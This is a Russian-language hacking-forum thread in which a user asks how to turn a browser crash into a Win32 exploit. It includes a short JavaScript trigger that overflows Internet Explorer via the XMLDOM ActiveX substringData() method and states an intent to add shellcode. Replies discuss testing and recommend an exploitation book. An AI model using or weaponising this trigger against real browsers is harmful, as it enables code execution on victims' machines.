• XSS.stack #1 – первый литературный журнал от юзеров форума

Эксплоитинг Win32

pro5to

RAM
Пользователь
Регистрация
12.09.2006
Сообщения
132
Реакции
3
Интересуют статьи связанные с эксплоитингом в Win32, хотелось бы увидеть наглядные примеры написания эксплойта под win... буду рад любым ссылкам, статьям...

хочу въехать в элементарные вещи, допустим есть бага в active-x компоненте
Код:
<script>
var xmlDoc = new ActiveXObject("Microsoft.XMLDOM");
xmlDoc.loadXML("<dummy></dummy>");
var txt = xmlDoc.createTextNode("huh");
var out = txt.substringData(1,0x7fffffff);
</script>
тут методу substringData() передается число 7FFFFFFFh после чего происходит переполнение, хочу научится ставить на борт shellcode под WIN. Сабж...

перенесите в раздел "Уязвимости и эксплойты"
 
у меня к примеру не работает тестил на чистом хп сп1 мб XML core не той версии или ваще его надо доставлять = ) ...

а ваще показал бы скрины ольки, че там в стеке, где стопится и т.д. мб просто дос ...
 
Валит осла 7 на WinXP SP2 и на висте тестил.
мб просто дос ...
Я знаю, реально же прикрутить шеллкод и будет выполнение зловредного кода.
Интересует все тонкости, есть чего почитать?
 
Купи книгу "Разработка средств безопасности и эксплойтов" изд. Питер.
Там всё подробно описано. В электронном виде тут :zns5: Скачать|Download
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх